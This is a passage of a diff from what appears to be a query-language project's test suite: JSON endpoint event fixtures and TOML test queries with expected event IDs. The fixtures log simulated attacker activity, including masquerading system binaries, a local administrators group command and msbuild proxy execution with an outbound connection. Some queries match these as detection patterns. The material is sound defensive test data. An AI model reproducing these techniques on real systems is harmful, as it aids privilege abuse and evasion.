2, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 1680, + "ppid": 2256, + "process_name": "wininit.exe", + "process_path": "C:\\workspace\\red_ttp\\wininit.exe", + "serial_event_id": 85, + "subtype": "terminate", + "timestamp": 131509374597163070, + "unique_pid": 84, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_delete_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "wininit.exe", + "file_path": "C:\\workspace\\red_ttp\\wininit.exe", + "opcode": 2, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 86, + "subtype": "modify", + "timestamp": 131509374597163070, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "WININIT.EXE-F4D46129.pf", + "file_path": "C:\\Windows\\Prefetch\\WININIT.EXE-F4D46129.pf", + "opcode": 0, + "pid": 896, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 87, + "subtype": "create", + "timestamp": 131509374597163070, + "unique_pid": 16, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "explorer.exe", + "file_path": "C:\\workspace\\red_ttp\\explorer.exe", + "opcode": 0, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 88, + "subtype": "create", + "timestamp": 131509374597163070, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "explorer.exe", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 4080, + "ppid": 2256, + "process_name": "explorer.exe", + "process_path": "C:\\workspace\\red_ttp\\explorer.exe", + "serial_event_id": 89, + "subtype": "create", + "timestamp": 131509374597163070, + "unique_pid": 89, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 2, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 4080, + "ppid": 2256, + "process_name": "explorer.exe", + "process_path": "C:\\workspace\\red_ttp\\explorer.exe", + "serial_event_id": 90, + "subtype": "terminate", + "timestamp": 131509374647239400, + "unique_pid": 89, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_delete_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "explorer.exe", + "file_path": "C:\\workspace\\red_ttp\\explorer.exe", + "opcode": 2, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 91, + "subtype": "modify", + "timestamp": 131509374647239400, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "EXPLORER.EXE-854AF04C.pf", + "file_path": "C:\\Windows\\Prefetch\\EXPLORER.EXE-854AF04C.pf", + "opcode": 0, + "pid": 896, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 92, + "subtype": "create", + "timestamp": 131509374647239400, + "unique_pid": 16, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "21f73cd55626f0ec9fbce53eafbef128", + "opcode": 2, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2256, + "ppid": 1788, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 93, + "subtype": "terminate", + "timestamp": 131509374647239400, + "unique_pid": 54, + "unique_ppid": 53, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "5746bd7e255dd6a8afa06f7c42c1ba41", + "opcode": 2, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 1788, + "ppid": 420, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "serial_event_id": 94, + "subtype": "terminate", + "timestamp": 131509374647239400, + "unique_pid": 53, + "unique_ppid": 48, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "something.json", + "file_path": "C:\\workspace\\dev\\TestLogs\\something.json", + "opcode": 0, + "pid": 420, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 95, + "subtype": "create", + "timestamp": 131509374647239400, + "unique_pid": 48, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "something.json", + "file_path": "C:\\workspace\\Libraries\\myapp\\myapp\\python\\myapp\\something.json", + "opcode": 0, + "pid": 420, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 96, + "subtype": "create", + "timestamp": 131509374647239400, + "unique_pid": 48, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "authentication_id": 854482244, + "command_line": "net localgroup administrators findme2", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "63dd6fbaabf881385899fd39df13dce3", + "opcode": 1, + "original_file_name": "NET.exe", + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3608, + "ppid": 392, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "serial_event_id": 97, + "subtype": "create", + "timestamp": 131605904083494370, + "unique_pid": 750058, + "unique_ppid": 707545, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "authentication_id": 854482244, + "command_line": "C:\\Windows\\system32\\net1 localgroup administrators findme2", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "3b6928bc39e5530cead1e99269e7b1ee", + "opcode": 1, + "original_file_name": "net1.exe", + "parent_process_name": "net.exe", + "parent_process_path": "C:\\Windows\\System32\\net.exe", + "pid": 1348, + "ppid": 3608, + "process_name": "net1.exe", + "process_path": "C:\\Windows\\System32\\net1.exe", + "serial_event_id": 98, + "subtype": "create", + "timestamp": 131605904083806370, + "unique_pid": 750059, + "unique_ppid": 750058, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "authentication_id": 13728872, + "command_line": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe tmp-file.csproj", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "4b736b85e5de65e572f28a91e31b99bf", + "opcode": 1, + "original_file_name": "MSBuild.exe", + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 860, + "ppid": 1196, + "process_name": "MSBuild.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe", + "serial_event_id": 75273, + "subtype": "create", + "timestamp": 131762381484502110, + "unique_pid": 75273, + "unique_ppid": 75248, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "4b736b85e5de65e572f28a91e31b99bf", + "opcode": 2, + "original_file_name": "MSBuild.exe", + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 860, + "ppid": 1196, + "process_name": "MSBuild.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe", + "serial_event_id": 75303, + "subtype": "terminate", + "timestamp": 131762381493483680, + "unique_pid": 75273, + "unique_ppid": 75248, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "destination_address": "10.6.48.157", + "destination_port": 8000, + "event_subtype_full": "ipv4_connection_attempt_event", + "event_type": "network", + "event_type_full": "network_event", + "opcode": 12, + "pid": 860, + "process_name": "MSBuild.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe", + "protocol": "tcp", + "serial_event_id": 75304, + "source_address": "10.6.48.157", + "source_port": 52178, + "subtype": "outgoing", + "timestamp": 131762381493039760, + "unique_pid": 75273, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "destination_address": "10.6.48.157", + "destination_port": 8000, + "event_subtype_full": "ipv4_connection_attempt_event", + "event_type": "network", + "event_type_full": "network_event", + "mysterious_field": { + "num": 100, + "outer_cross_match": "s3-c-x-y", + "subarray": [ + { + "a": "s0-a", + "b": [ + "s0-b" + ], + "c": [ + { + "x": { + "y": "s0-c-x-y" + }, + "z": "s0-c0-x-z" + }, + { + "x": { + "y": "s0-c-x-y" + }, + "z": "s0-c1-x-z" + } + ], + "cross_match": "s0-c1-x-z" + }, + { + "a": "s1-a", + "b": [ + "s1-b" + ], + "c": [] + }, + { + "a": "s2-a", + "b": [ + "s2-b" + ], + "c": [] + }, + { + "a": "s3-a", + "b": [ + "s3-b" + ], + "c": [ + { + "x": { + "y": "s3-c-x-y" + }, + "z": "s3-c-x-z" + } + ] + } + ], + "this_is_for_testing_nested_data": "true" + }, + "opcode": 12, + "pid": 10000, + "process_name": "MSBuild.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe", + "protocol": "tcp", + "serial_event_id": 75305, + "source_address": "10.6.48.157", + "source_port": 52178, + "subtype": "outgoing", + "timestamp": 131762381493039760, + "unique_pid": 99999, + "user_domain": "vagrant", + "user_name": "vagrant" + } +] diff --git a/eql/etc/test_queries.toml b/eql/etc/test_queries.toml new file mode 100644 index 0000000..833528a --- /dev/null +++ b/eql/etc/test_queries.toml @@ -0,0 +1,1151 @@ +[queries.q000] +query = 'process where serial_event_id = 1' +expected_event_ids = [1] + +[queries.q001] +query = 'process where serial_event_id < 4' +expected_event_ids = [1, 2, 3] + +[queries.q002] +query = 'process where true | head 6' +expected_event_ids = [1, 2, 3, 4, 5, 6] + +[queries.q003] +query = 'process where false' +expected_event_ids = [] + +[queries.q004] +expected_event_ids = [] +query = 'process where missing_field != null' + +[queries.q005] +expected_event_ids = [1, 2, 3, 4, 5] +query = 'process where bad_field == null | head 5' + +[queries.q006] +query = ''' + process where process_name == "impossible name" or (serial_event_id < 4.5 and serial_event_id >= 3.1) +''' +expected_event_ids = [4] + +[queries.q007] +tags = ["comparisons", "pipes"] +query = ''' +process where serial_event_id <= 8 and serial_event_id > 7 +| filter serial_event_id == 8''' +expected_event_ids = [8] + +[queries.q008] +query = ''' +process where true +| filter serial_event_id <= 10 +| filter serial_event_id > 6''' +expected_event_ids = [7, 8, 9, 10] + +[queries.q009] +query = ''' +process where true +| filter serial_event_id <= 10 +| filter serial_event_id > 6 +| head 2''' +expected_event_ids = [7, 8] + +[queries.q010] +query = ''' +process where true +| head 1000 +| filter serial_event_id <= 10 +| filter serial_event_id > 6 +| tail 2 +''' +expected_event_ids = [9, 10] + +[queries.q011] +query = ''' +process where serial_event_id<=8 and serial_event_id > 7 +''' +expected_event_ids = [8] + +[queries.q012] +note = "check that comparisons against null values return false" +expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] +query = 'process where exit_code >= 0' + +[queries.q013] +note = "check that comparisons against null values return false" +expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] +query = 'process where 0 <= exit_code' + +[queries.q014] +note = "check that comparisons against null values return false" +expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] +query = 'process where exit_code <= 0' + +[queries.q015] +note = "check that comparisons against null values return false" +expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] +query = 'process where exit_code < 1' + +[queries.q016] +note = "check that comparisons against null values return false" +expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] +query = 'process where exit_code > -1' + +[queries.q017] +note = "check that comparisons against null values return false" +expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] +query = 'process where -1 < exit_code' + +[queries.q018] +note = "check that comparisons against null values return false" +expected_event_ids = [] +query = ''' +process where not (exit_code > -1) + and serial_event_id in (58, 64, 69, 74, 80, 85, 90, 93, 94) +| head 10 +''' + +[queries.q019] +note = "check that comparisons against null values return false" +expected_event_ids = [1, 2, 3, 4, 5, 6, 7] +query = 'process where not (exit_code > -1) | head 7' + +[queries.q020] +note = "check that comparisons against null values return false" +expected_event_ids = [1, 2, 3, 4, 5, 6, 7] +query = 'process where not (-1 < exit_code) | head 7' + +[queries.q021] +query = 'process where exit_code > 0' +expected_event_ids = [] + +[queries.q022] +query = 'process where exit_code < 0' +expected_event_ids = [] + +[queries.q023] +query = 'process where 0 < exit_code' +expected_event_ids = [] + +[queries.q024] +query = 'process where 0 > exit_code' +expected_event_ids = [] + +[queries.q025] +query = 'process where (serial_event_id<=8 and serial_event_id > 7) and (opcode=3 and opcode>2)' +expected_event_ids = [8] + +[queries.q026] +query = 'process where (serial_event_id<9 and serial_event_id >= 7) or (opcode == pid)' +expected_event_ids = [7, 8] + +[queries.q027] +query = 'process where process_name == "VMACTHLP.exe" and unique_pid == 12 | filter true' +expected_event_ids = [12] + +[queries.q028] +query = ''' +process where process_name in ("python.exe", "SMSS.exe", "explorer.exe") +| unique process_name''' +expected_event_ids = [3, 34, 48] + +[queries.q029] +query = ''' +process where process_name in ("python.exe", "smss.exe", "Explorer.exe") +| unique length(process_name)''' +expected_event_ids = [3, 34, 48] + +[queries.q030] +query = ''' +process where process_name in ("python.exe", "smss.exe", "explorer.exe") +| unique length(process_name) == length("python.exe")''' +expected_event_ids = [3, 48] + +[queries.q031] +query = ''' +process where process_name in ("Python.exe", "smss.exe", "explorer.exe") +| unique process_name != "python.exe"''' +expected_event_ids = [3, 48] + +[queries.q032] +query = ''' +process where process_name in ("python.exe", "smss.exe", "explorer.exe") +| unique process_name +| head 2 +| tail 1''' +expected_event_ids = [34] + +[queries.q033] +query = ''' +process where process_name in ("python.exe", "smss.exe", "explorer.exe") +| unique process_name +| tail 2 +| head 1''' +expected_event_ids = [34] + +[queries.q034] +query = ''' +process where process_name in ("python.exe", "smss.exe") +| unique process_name parent_process_name''' +expected_event_ids = [3, 48, 50, 54, 78] + +[queries.q035] +query = ''' +process where process_name in ("python.exe", "smss.exe") +| unique process_name, parent_process_name''' +expected_event_ids = [3, 48, 50, 54, 78] + +[queries.q036] +query = ''' +process where process_name in ("python.exe", "smss.exe") +| head 5 +| unique process_name parent_process_name''' +expected_event_ids = [3, 48, 50, 54] + +[queries.q037] +expected_event_ids = [57] +query = ''' +registry where length(bytes_written_string_list) == 2 and bytes_written_string_list[1] == "EN"''' + +[queries.q038] +query = ''' +registry where key_path == "*\\MACHINE\\SAM\\SAM\\*\\Account\\Us*ers\\00*03E9\\F"''' +expected_event_ids = [79] + +[queries.q039] +query = ''' +process where process_path == "*\\red_ttp\\wininit.*" and opcode in (0,1,2,3,4)''' +expected_event_ids = [84, 85] + +[queries.q040] +query = ''' +file where file_name == "csrss.exe" and opcode=0 + and descendant of [process where opcode in (1,3) and process_name="cmd.exe"] +''' +expected_event_ids = [72] + +[queries.q041] +query = ''' +process where opcode=1 and process_name == "csrss.exe" + and descendant of [file where file_name == "csrss.exe" and opcode=0] +''' +expected_event_ids = [73] + +[queries.q042] +query = ''' +process where opcode=1 and process_name == "smss.exe" + and descendant of [ + file where file_name == "csrss.exe" and opcode=0 + and descendant of [ + process where opcode in(1,3) and process_name="cmd.exe" + ] + ] +''' +expected_event_ids = [78] + +[queries.q043] +query = ''' +file where file_path="*\\red_ttp\\winin*.*" + and opcode in (0,1,2) and user_name="vagrant" +''' +expected_event_ids = [83, 86] + +[queries.q044] +query = ''' +file where file_name in ("wininit.exe", "lsass.exe") and opcode == 2 +''' +expected_event_ids = [65, 86] + +[queries.q045] +query = ''' +file where true +| tail 3''' +expected_event_ids = [92, 95, 96] + +[queries.q046] +query = ''' +process where opcode in (1,3) and process_name in (parent_process_name, "SYSTEM") +''' +expected_event_ids = [2, 50, 51] + +[queries.q047] +expected_event_ids = [92, 95, 96, 91] +query = ''' +file where true +| tail 4 +| sort file_path''' + +[queries.q048] +expected_event_ids = [2, 1, 4, 3, 5] +query = ''' +process where true +| head 5 +| sort md5 event_subtype_full process_name''' + +[queries.q049] +expected_event_ids = [2, 1, 4, 3, 5] +query = ''' +process where true +| head 5 +| sort md5 event_subtype_full null_field process_name''' + +[queries.q050] +expected_event_ids = [2, 1, 4, 3, 5] +query = ''' +process where true +| head 5 +| sort md5, event_subtype_full, null_field, process_name''' + +[queries.q051] +expected_event_ids = [2, 1] +query = ''' +process where true +| head 5 +| sort md5 event_subtype_full null_field process_name +| head 2''' + +[queries.q052] +expected_event_ids = [1, 2, 3, 4, 5] +query = ''' +process where true +| head 5 +| sort md5 event_subtype_full null_field process_name +| sort serial_event_id''' + +[queries.q053] +query = ''' +sequence [process where serial_event_id = 1] [process where serial_event_id = 2]''' +expected_event_ids = [1, 2] + +[queries.q054] +query = ''' +sequence [process where serial_event_id < 5] [process where serial_event_id = 5]''' +expected_event_ids = [4, 5] + +[queries.q055] +query = ''' +sequence [process where serial_event_id=1] by unique_pid [process where true] by unique_ppid''' +expected_event_ids = [1, 2] + +[queries.q056] +query = ''' +sequence [process where serial_event_id<3] by unique_pid [process where true] by unique_ppid''' +expected_event_ids = [1, 2, 2, 3] + +[queries.q057] +query = ''' +sequence + [file where event_subtype_full == "file_create_event"] by file_path + [process where opcode == 1] by process_path + [process where opcode == 2] by process_path + [file where event_subtype_full == "file_delete_event"] by file_path +| head 4 +| tail 2''' +expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75] + +[queries.q058] +query = ''' +sequence with maxspan=1d + [file where event_subtype_full == "file_create_event"] by file_path + [process where opcode == 1] by process_path + [process where opcode == 2] by process_path + [file where event_subtype_full == "file_delete_event"] by file_path +| head 4 +| tail 2''' +expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75] + +[queries.q059] +query = ''' +sequence with maxspan=1h + [file where event_subtype_full == "file_create_event"] by file_path + [process where opcode == 1] by process_path + [process where opcode == 2] by process_path + [file where event_subtype_full == "file_delete_event"] by file_path +| head 4 +| tail 2''' +expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75] + +[queries.q060] +query = ''' +sequence with maxspan=1m + [file where event_subtype_full == "file_create_event"] by file_path + [process where opcode == 1] by process_path + [process where opcode == 2] by process_path + [file where event_subtype_full == "file_delete_event"] by file_path +| head 4 +| tail 2''' +expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75] + +[queries.q061] +query = ''' +sequence with maxspan=10s + [file where event_subtype_full == "file_create_event"] by file_path + [process where opcode == 1] by process_path + [process where opcode == 2] by process_path + [file where event_subtype_full == "file_delete_event"] by file_path +| head 4 +| tail 2''' +expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75] + +[queries.q062] +query = ''' +sequence with maxspan=0.5s + [file where event_subtype_full == "file_create_event"] by file_path + [process where opcode == 1] by process_path + [process where opcode == 2] by process_path + [file where event_subtype_full == "file_delete_event"] by file_path +| head 4 +| tail 2''' +expected_event_ids = [] + +[queries.q063] +query = ''' +sequence + [process where serial_event_id < 5] + [process where serial_event_id < 5] +''' +expected_event_ids = [1, 2, 2, 3, 3, 4] + +[queries.q064] +query = ''' +sequence + [file where opcode=0 and file_name="svchost.exe"] by unique_pid + [process where opcode == 1] by unique_ppid +''' +expected_event_ids = [55, 56] + +[queries.q065] +query = ''' +sequence + [file where opcode=0] by unique_pid + [file where opcode=0] by unique_pid +| head 1''' +expected_event_ids = [55, 61] + +[queries.q066] +query = ''' +sequence + [file where opcode=0] by unique_pid + [file where opcode=0] by unique_pid +| filter events[1].serial_event_id == 92''' +expected_event_ids = [87, 92] + +[queries.q067] +query = ''' +sequence + [file where opcode=0 and file_name="*.exe"] by unique_pid + [file where opcode=0 and file_name="*.exe"] by unique_pid +until [process where opcode=5000] by unique_ppid +| head 1''' +expected_event_ids = [55, 61] + +[queries.q068] +query = ''' +sequence + [file where opcode=0 and file_name="*.exe"] by unique_pid + [file where opcode=0 and file_name="*.exe"] by unique_pid +until [process where opcode=1] by unique_ppid +| head 1''' +expected_event_ids = [] + +[queries.q069] +query = ''' +join + [file where opcode=0 and file_name="*.exe"] by unique_pid + [file where opcode=2 and file_name="*.exe"] by unique_pid +until [process where opcode=1] by unique_ppid +| head 1''' +expected_event_ids = [61, 59] + +[queries.q070] +query = ''' +join by user_name + [process where opcode in (1,3) and process_name="smss.exe"] + [process where opcode in (1,3) and process_name == "python.exe"]''' +expected_event_ids = [78, 48] + +[queries.q071] +query = ''' +join by unique_pid + [process where opcode=1] + [file where opcode=0 and file_name="svchost.exe"] + [file where opcode == 0 and file_name == "lsass.exe"]''' +expected_event_ids = [54, 55, 61] + +[queries.q072] +query = ''' +join by unique_pid + [process where opcode=1] + [file where opcode=0 and file_name="svchost.exe"] + [file where opcode == 0 and file_name == "lsass.exe"] +until [file where opcode == 2]''' +expected_event_ids = [] + +[queries.q073] +query = ''' +join + [file where opcode=0 and file_name="svchost.exe"] by unique_pid + [process where opcode == 1] by unique_ppid''' +expected_event_ids = [55, 56] + +[queries.q074] +query = ''' +join by unique_pid + [process where opcode in (1,3) and process_name="python.exe"] + [file where file_name == "*.exe"]''' +expected_event_ids = [54, 55] + +[queries.q075] +query = ''' +join by user_name + [process where opcode in (1,3) and process_name="python.exe"] + [process where opcode in (1,3) and process_name == "smss.exe"]''' +expected_event_ids = [48, 78] + +[queries.q076] +query = ''' +join + [process where opcode in (1,3) and process_name="python.exe"] + [process where opcode in (1,3) and process_name == "smss.exe"] +''' +expected_event_ids = [48, 3, 50, 78] + +[queries.q077] +expected_event_ids = [] +query = ''' +process where fake_field == "*"''' + +[queries.q078] +expected_event_ids = [1, 2, 3, 4] +query = ''' +process where fake_field != "*" +| head 4''' + +[queries.q079] +expected_event_ids = [1, 2, 3, 4] +query = ''' +process where not (fake_field == "*") +| head 4''' + +[queries.q080] +expected_event_ids = [] +query = ''' +registry where invalid_field_name != null''' + +[queries.q081] +expected_event_ids = [] +query = ''' +registry where length(bad_field) > 0''' + +[queries.q082] +query = ''' +process where opcode == 1 + and process_name in ("net.exe", "net1.exe") + and not (parent_process_name == "net.exe" + and process_name == "net1.exe") + and command_line == "*group *admin*" and command_line != "* /add*"''' +expected_event_ids = [97] + +[queries.q083] +expected_event_ids = [1, 55, 57, 63, 75304] +query = ''' +any where true +| unique event_type_full''' + +[queries.q084] +query = ''' +process where opcode=1 and process_name in ("services.exe", "smss.exe", "lsass.exe") + and descendant of [process where process_name == "cmd.exe" ]''' +expected_event_ids = [62, 68, 78] + +[queries.q085] +query = ''' +process where process_name in ("services.exe", "smss.exe", "lsass.exe") + and descendant of [process where process_name == "cmd.exe" ]''' +expected_event_ids = [62, 64, 68, 69, 78, 80] + +[queries.q086] +query = ''' +process where opcode=2 and process_name in ("services.exe", "smss.exe", "lsass.exe") + and descendant of [process where process_name == "cmd.exe" ]''' +expected_event_ids = [64, 69, 80] + +[queries.q087] +query = ''' +process where process_name="svchost.exe" + and child of [file where file_name="svchost.exe" and opcode=0]''' +expected_event_ids = [56, 58] + +[queries.q088] +query = ''' +process where process_name="svchost.exe" + and not child of [file where file_name="svchost.exe" and opcode=0] +| head 3''' +expected_event_ids = [11, 13, 15] + +[queries.q089] +query = ''' +process where process_name="lsass.exe" + and child of [ + process where process_name="python.exe" + and child of [process where process_name="cmd.exe"] + ] +''' +expected_event_ids = [62, 64] + +[queries.q090] +query = ''' +file where child of [ + process where child of [ + process where child of [process where process_name="*wsmprovhost.exe"] + ] +] +| tail 1''' +expected_event_ids = [91] + +[queries.q091] +query = ''' +file where process_name = "python.exe" +| unique unique_pid''' +expected_event_ids = [55, 95] + +[queries.q092] +query = ''' +file where event of [process where process_name = "python.exe" ] +| unique unique_pid''' +expected_event_ids = [55, 95] + +[queries.q093] +query = ''' +process where process_name = "python.exe"''' +expected_event_ids = [48, 50, 51, 54, 93] + +[queries.q094] +query = 'process where event of [process where process_name = "python.exe" ]' +expected_event_ids = [48, 50, 51, 54, 93] + +[queries.q095] +query = ''' +sequence + [file where file_name="lsass.exe"] by file_path,process_path + [process where true] by process_path,parent_process_path +''' +expected_event_ids = [61, 62] + +[queries.q096] +query = ''' +sequence by user_name + [file where file_name="lsass.exe"] by file_path, process_path + [process where true] by process_path, parent_process_path +''' +expected_event_ids = [61, 62] + +[queries.q097] +query = ''' +sequence by pid + [file where file_name="lsass.exe"] by file_path,process_path + [process where true] by process_path,parent_process_path +''' +expected_event_ids = [] + +[queries.q098] +query = ''' +sequence by user_name + [file where opcode=0] by file_path + [process where opcode=1] by process_path + [process where opcode=2] by process_path + [file where opcode=2] by file_path +| tail 1''' +expected_event_ids = [88, 89, 90, 91] + +[queries.q099] +query = ''' +sequence by user_name + [file where opcode=0] by pid,file_path + [file where opcode=2] by pid,file_path +until [process where opcode=2] by ppid,process_path +''' +expected_event_ids = [] + +[queries.q100] +query = ''' +sequence by user_name + [file where opcode=0] by pid,file_path + [file where opcode=2] by pid,file_path +until [process where opcode=5] by ppid,process_path +| head 2''' +expected_event_ids = [55, 59, 61, 65] + +[queries.q101] +query = ''' +sequence by pid + [file where opcode=0] by file_path + [process where opcode=1] by process_path + [process where opcode=2] by process_path + [file where opcode=2] by file_path +| tail 1''' +expected_event_ids = [] + +[queries.q102] +query = ''' +join by user_name + [file where true] by pid,file_path + [process where true] by ppid,process_path +| head 2''' +expected_event_ids = [55, 56, 59, 58] + +[queries.q103] +query = ''' +sequence + [process where true] by unique_pid + [file where true] fork=true by unique_pid + [process where true] by unique_ppid +| head 4''' +expected_event_ids = [54, 55, 56, 54, 61, 62, 54, 67, 68, 54, 72, 73] + +[queries.q104] +query = ''' +process where command_line == "*%*" ''' +expected_event_ids = [4, 6, 28] + +[queries.q105] +query = ''' +process where command_line == "*%*%*" ''' +expected_event_ids = [4, 6, 28] + +[queries.q106] +query = ''' +process where command_line == "%*%*" ''' +expected_event_ids = [4, 6, 28] + +[queries.q107] +expected_event_ids = [11, 60, 63] +query = ''' +any where process_name == "svchost.exe" +| unique_count event_type_full process_name''' + +[queries.q108] +expected_event_ids = [63, 60, 11] +query = ''' +any where process_name == "svchost.exe" +| sort event_type_full serial_event_id +| unique_count event_type_full process_name''' + +[queries.q109] +expected_event_ids = [60] +query = ''' +any where process_name == "svchost.exe" +| unique_count event_type_full opcode +| filter count == 7''' + +[queries.q110] +expected_event_ids = [11] +query = ''' +any where process_name == "svchost.exe" +| unique_count event_type_full opcode +| filter percent >= .5 +''' + +[queries.q111] +expected_event_ids = [57] +query = ''' +registry where arrayContains(bytes_written_string_list, 'En-uS')''' + +[queries.q112] +expected_event_ids = [57] +query = ''' +registry where arrayContains(bytes_written_string_list, 'En')''' + +[queries.q113] +expected_event_ids = [57] +query = ''' +registry where length(bytes_written_string_list) > 0 and bytes_written_string_list[0] == 'EN-us' +''' + +[queries.q114] +expected_event_ids = [57] +query = ''' +registry where bytes_written_string_list[0] == 'EN-us' +''' + +[queries.q115] +expected_event_ids = [57] +query = ''' +registry where bytes_written_string_list[1] == 'EN' +''' + +[queries.q116] +query = ''' +process where matchLite(?'.*?net1\s+localgroup\s+.*?', command_line) +''' +expected_event_ids = [98] + +[queries.q117] +query = ''' +process where matchLite(?'.*?net1\s+\w+\s+.*?', command_line) +''' +expected_event_ids = [98] + +[queries.q118] +query = ''' +process where matchLite(?'.*?net1\s+\w{4,15}\s+.*?', command_line) +''' +expected_event_ids = [98] + +[queries.q119] +expected_event_ids = [98] +query = ''' +process where match(?'.*?net1\s+\w{4,15}\s+.*?', command_line) +''' + +[queries.q120] +query = ''' +process where matchLite(?'.*?net1\s+[localgrup]{4,15}\s+.*?', command_line) +''' +expected_event_ids = [98] + +[queries.q121] +query = ''' +process where 'net.EXE' == original_file_name +| filter process_name="net*.exe" +''' +expected_event_ids = [97] +note = "check that case insensitive comparisons are performed even for lhs strings." + +[queries.q122] +query = ''' +process where process_name == original_file_name +| filter process_name='net*.exe' +''' +expected_event_ids = [97, 98] +note = "check that case insensitive comparisons are performed for fields." + +[queries.q123] +query = ''' +process where original_file_name == process_name +| filter length(original_file_name) > 0 +''' +expected_event_ids = [97, 98, 75273, 75303] +description = "check that case insensitive comparisons are performed for fields." + +[queries.q124] +query = ''' +file where opcode=0 and startsWith(file_name, 'exploRER.') +''' +expected_event_ids = [88, 92] +description = "check built-in string functions" + +[queries.q125] +query = ''' +file where opcode=0 and startsWith(file_name, 'expLORER.exe') +''' +expected_event_ids = [88, 92] +description = "check built-in string functions" + +[queries.q126] +query = ''' +file where opcode=0 and endsWith(file_name, 'loREr.exe')''' +expected_event_ids = [88] +description = "check built-in string functions" + +[queries.q127] +query = ''' +file where opcode=0 and startsWith(file_name, 'explORER.EXE')''' +expected_event_ids = [88, 92] +description = "check built-in string functions" + +[queries.q128] +query = ''' +file where opcode=0 and startsWith('explorer.exeaaaaaaaa', file_name)''' +expected_event_ids = [88] +description = "check built-in string functions" + +[queries.q129] +query = ''' +file where opcode=0 and serial_event_id = 